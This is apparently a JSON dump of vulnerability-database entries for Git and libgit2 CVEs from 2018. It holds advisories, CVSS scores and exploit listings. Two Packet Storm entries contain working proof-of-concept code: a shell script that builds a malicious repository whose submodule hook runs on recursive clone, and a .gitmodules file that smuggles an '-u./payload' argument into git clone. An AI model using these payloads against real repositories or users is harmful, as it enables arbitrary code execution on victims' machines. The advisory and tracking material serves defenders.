"PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10888"], "modified": "2018-07-10T14:29:00", "id": "DEBIANCVE:CVE-2018-10888", "href": "https://security-tracker.debian.org/tracker/CVE-2018-10888", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T06:00:13", "description": "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-07-10T14:29:00", "type": "debiancve", "title": "CVE-2018-10887", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887"], "modified": "2018-07-10T14:29:00", "id": "DEBIANCVE:CVE-2018-10887", "href": "https://security-tracker.debian.org/tracker/CVE-2018-10887", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-04T05:59:02", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs \"git clone --recurse-submodules\" because submodule \"names\" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with \"../\" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-30T04:29:00", "type": "debiancve", "title": "CVE-2018-11235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-30T04:29:00", "id": "DEBIANCVE:CVE-2018-11235", "href": "https://security-tracker.debian.org/tracker/CVE-2018-11235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-19T20:09:06", "description": "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-10T14:29:00", "type": "cve", "title": "CVE-2018-10888", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10888"], "modified": "2022-04-19T16:09:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-10888", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10888", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-19T20:09:09", "description": "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-07-10T14:29:00", "type": "cve", "title": "CVE-2018-10887", "cwe": ["CWE-125", "CWE-190", "CWE-681"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887"], "modified": "2022-04-19T16:07:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-10887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10887", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:16:44", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs \"git clone --recurse-submodules\" because submodule \"names\" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with \"../\" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-30T04:29:00", "type": "cve", "title": "CVE-2018-11235", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2020-05-02T00:15:00", "cpe": ["cpe:/a:git-scm:git:2.15.1", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/a:git-scm:git:2.13.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:git-scm:git:2.17.0", "cpe:/a:git-scm:git:2.16.3", "cpe:/a:git-scm:git:2.14.3", "cpe:/a:gitforwindows:git:2.17.1"], "id": "CVE-2018-11235", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.17.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:gitforwindows:git:2.17.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.13.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.15.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:git-scm:git:2.16.3:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-06-01T23:14:40", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-06-01T00:00:00", "type": "zdt", "title": "Git < 2.17.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-01T00:00:00", "id": "1337DAY-ID-30518", "href": "https://0day.today/exploit/description/30518", "sourceData": "", "sourceHref": "https://0day.today/exploit/30518", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T02:14:40", "description": "Sourcetree suffers from multiple remote code execution vulnerabilities related to git submodules and argument injection. macOS versions 1.0b2 up to 2.7.6 and Windows versions 0.5.1.0 up to 2.6.10 are affected.", "cvss3": {}, "published": "2018-07-25T00:00:00", "type": "zdt", "title": "Sourcetree Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13386", "CVE-2018-11235", "CVE-2018-13385"], "modified": "2018-07-25T00:00:00", "id": "1337DAY-ID-30774", "href": "https://0day.today/exploit/description/30774", "sourceData": "Sourcetree Remote Code Execution Exploit\r\n\r\nCVE ID:\r\n\r\n* CVE-2018-11235.\r\n* CVE-2018-13385.\r\n* CVE-2018-13386.\r\n\r\n\r\nProduct: Sourcetree.\r\n\r\nAffected Sourcetree product versions:\r\n\r\n* for macOS, 1.0b2 <= version < 2.7.6\r\n* for Windows, 0.5.1.0 <= version < 2.6.10\r\n\r\n\r\nFixed Sourcetree product versions:\r\n\r\n* for macOS, Sourcetree 2.7.6 has been released with a fix for these issues.\r\n* for Windows, Sourcetree 2.6.10 has been released with a fix for these issues.\r\n\r\n\r\nSummary:\r\nThis advisory discloses critical severity security vulnerabilities. Versions of\r\nSourcetree are affected by these vulnerabilities.\r\n\r\n\r\n\r\nCustomers who have upgraded Sourcetree to version 2.7.6 (Sourcetree for macOS)\r\nor 2.6.10 (Sourcetree for Windows) are not affected.\r\n\r\nCustomers who have downloaded and installed Sourcetree >= 1.0b2 but less than\r\n2.7.6 (the fixed version for macOS) or who have downloaded and installed\r\nSourcetree >= 0.5.1.0 but less than 2.6.10 (the fixed version for\r\nWindows) please\r\nupgrade your Sourcetree installations immediately to fix these vulnerabilities.\r\n\r\n\r\n\r\nSourcetree for macOS - Git submodules vulnerability (CVE-2018-11235)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThe embedded version of Git used in Sourcetree for macOS was vulnerable to\r\nCVE-2018-11235. An attacker can exploit this issue if they can commit to a Git\r\nrepository linked in Sourcetree for macOS or that has been recursively cloned or\r\nif a user interacts with a submodule. This allows them to execute arbitrary code\r\non systems running a vulnerable version of Sourcetree for macOS.\r\nVersions of Sourcetree for macOS starting with version 1.02b before version\r\n2.7.4 are affected by this vulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREE-5845 .\r\n\r\nSourcetree for Windows - Git submodules vulnerability (CVE-2018-11235)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThe embedded version of Git used in Sourcetree for Windows was vulnerable to\r\nCVE-2018-11235. An attacker can exploit this issue if they can commit to a Git\r\nrepository linked in Sourcetree for Windows or that has been recursively cloned\r\nor if a user interacts with a submodule. This allows them to execute arbitrary\r\ncode on systems running a vulnerable version of Sourcetree for Windows.\r\nVersions of Sourcetree for Windows starting with version 0.5.1.0 before version\r\n2.6.10 are affected by this vulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREEWIN-8882 .\r\n\r\nSourcetree for macOS - Argument injection via Mercurial repository filenames\r\n(CVE-2018-13385)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThere was an argument injection vulnerability in Sourcetree for macOS via\r\nfilenames in Mercurial repositories. An attacker with permission to commit to a\r\nMercurial repository linked in Sourcetree for macOS is able to exploit this\r\nissue to gain code execution on the system.\r\nVersions of Sourcetree for macOS before version 2.7.6 are affected by this\r\nvulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREE-5846 .\r\n\r\nSourcetree for Windows - Argument injection via Mercurial repository filenames\r\n(CVE-2018-13386)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThere was an argument injection vulnerability in Sourcetree for Windows via\r\nfilenames in Mercurial repositories. An attacker with permission to commit to a\r\nMercurial repository linked in Sourcetree for Windows is able to exploit this\r\nissue to gain code execution on the system.\r\nVersions of Sourcetree for Windows before version 2.6.10 are affected by this\r\nvulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREEWIN-8884 .\r\n\r\n\r\n\r\nFix:\r\n\r\nTo address these issues, we've released the following versions containing a\r\nfix:\r\n\r\n* Sourcetree for macOS version 2.7.6\r\n* Sourcetree for Windows version 2.6.10\r\n\r\nRemediation:\r\n\r\nUpgrade Sourcetree for Windows to version 2.6.10 or higher.\r\n\r\nThe vulnerabilities and fix versions are described above. If affected, you\r\nshould upgrade to the latest version immediately.\r\n\r\nIf you are running Sourcetree macOS and cannot upgrade to 2.6.10 (Sourcetree for\r\nWindows), upgrade to version 2.7.6.\r\n\r\n\r\nFor a full description of the latest version of Sourcetree, see the release\r\nnotes found at https://www.sourcetreeapp.com/update/releasenotes/2.7.6.html.\r\nYou can download the latest version of Sourcetree from the download centre\r\nfound at https://www.sourcetreeapp.com/.\r\n\r\nAcknowledgements:\r\nAtlassian would like to credit Etienne Stalmans and Terry Zhang at Tophant for\r\nreporting these issues to us.\n\n# 0day.today [2018-07-25] #", "sourceHref": "https://0day.today/exploit/30774", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-06-05T01:34:31", "description": "", "cvss3": {}, "published": "2018-06-01T00:00:00", "type": "packetstorm", "title": "Git Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-01T00:00:00", "id": "PACKETSTORM:148010", "href": "https://packetstormsecurity.com/files/148010/Git-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Git (code execution) \n# Date: 2018-05-29 \n# Exploit Author: JameelNabbo \n# Website: jameelnabbo.com <http://jameelnabbo.com/> \n# Vendor Homepage: https://github.com/git/git <https://github.com/git/git> \n# CVE: CVE-2018-11235 \n#Version: <=2.17.1 \n# Tested on Kali Linux \n \n \nP0C: \n \nCreate two files: \npwned.sh: the file which will contain our commands to be executed \ncommit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file \n \nadd the follwing to Pwned.sh: \n#!/bin/sh \ncat << EOF \n \n#here we can put our lovely commands \nExploited! : $(ifconfig) \n \nEOF \n \n#-------- \n \nAdd the follwing to commit.sh file: \n#!/bin/sh \n \nset -e \n \nrepo_dir=\"$PWD/repo\" \n#change it to any other Repo \nrepo_submodule='https://github.com/JameelNabbo/SmartWorm' \n \ngit init \"$repo_dir\" \ncd \"$repo_dir\" \ngit submodule add \"$repo_submodule\" pwned \nmkdir modules \ncp -r .git/modules/pwned modules \ncp ../pwned.sh modules/pwned/hooks/post-checkout \ngit config -f .gitmodules submodule.pwned.update checkout \ngit config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned \ngit add modules \ngit submodule add \"$repo_submodule\" \ngit add SmartWorm \ngit commit -am pwned \necho \"All done, now \\`git clone --recurse-submodules \\\"$repo_dir\\\" dest_dir\\`a \n \n \naaaaaa \nSolution: \nhttps://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/148010/git-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-17T18:18:51", "description": "", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "packetstorm", "title": "Git Submodule Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-17T00:00:00", "id": "PACKETSTORM:149836", "href": "https://packetstormsecurity.com/files/149836/Git-Submodule-Arbitrary-Code-Execution.html", "sourceData": "`# CVE-2018-17456 \n \nI've gotten a couple of questions about exploitation for the \n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we \ngo with some technical details. \n \n## TL;DR \n \n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository. \nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip \n \n## Exploitation \n \nThe `.gitmodules` file looks as follows: \n \n``` \n[submodule \"x:x\"] \npath = x:x \nurl = -u./payload \n``` \n \nThe actual command being injected is set by the url, `-u./payload` \npoints the `upload-pack` flag of git clone to the `payload` shell \nscript. Note also the `:` within the path, this part is needed to \nactually get the `payload` script executed. \n \nThe path will end up as the repository URL in the subsequent `clone` \noperation: \n \n``` \nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\", \n\"--no-checkout\", \"--progress\", \"--separate-git-dir\", \n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],... \n``` \n \nAs the actual URL from `.gitmodules` is interpreted as the `-u` \nargument. \n \nThe colon is due to the fact, that the colon character let us go past \nthose lines in `transport.c`: \n \n```c \n} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) { \nstruct bundle_transport_data *data = xcalloc(1, sizeof(*data)); \ntransport_check_allowed(\"file\"); \nret->data = data; \nret->vtable = &bundle_vtable; \nret->smart_options = NULL; \n``` \n \nDue to `url_is_local_not_ssh` will return false due to the colon \nin the path. And therefore later on in the code the smart_options \ncontaining the `uploadpack` setting are still in place: \n \n```c \n} else { \n/* Unknown protocol in URL. Pass to external handler. */ \nint len = external_specification_len(url); \nchar *handler = xmemdupz(url, len); \ntransport_helper_init(ret, handler); \n} \n \nif (ret->smart_options) { \nret->smart_options->thin = 1; \nret->smart_options->uploadpack = \"git-upload-pack\"; \nif (remote->uploadpack) \nret->smart_options->uploadpack = remote->uploadpack; \nret->smart_options->receivepack = \"git-receive-pack\";1 \nif (remote->receivepack) \nret->smart_options->receivepack = remote->receivepack; \n} \n``` \n \n## Further hints \n \nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows \nas a colon is a forbidden character within a path on Windows. However as noted by \nsome people during the disclosure: Git running within the Windows Subsystem for Linux or \ncygwin will allow exploitation on Windows hosts. \n \nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) \nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592). \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/149836/gitsubmod-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2021-10-19T20:40:13", "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-20T22:09:22", "type": "redhat", "title": "(RHSA-2018:1957) Important: git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-20T22:14:33", "id": "RHSA-2018:1957", "href": "https://access.redhat.com/errata/RHSA-2018:1957", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:49", "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\n* git: path sanity check in is_ntfs_dotgit() can read arbitrary memory (CVE-2018-11233)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-10T08:08:55", "type": "redhat", "title": "(RHSA-2018:2147) Important: rh-git29-git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-07-10T08:11:57", "id": "RHSA-2018:2147", "href": "https://access.redhat.com/errata/RHSA-2018:2147", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2022-02-27T11:51:02", "description": "**CentOS Errata and Security Advisory** CESA-2018:1957\n\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2018-June/059843.html\n\n**Affected packages:**\nemacs-git\nemacs-git-el\ngit\ngit-all\ngit-bzr\ngit-cvs\ngit-daemon\ngit-email\ngit-gui\ngit-hg\ngit-p4\ngit-svn\ngitk\ngitweb\nperl-Git\nperl-Git-SVN\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2018:1957", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-22T17:15:23", "type": "centos", "title": "emacs, git, gitk, gitweb, perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 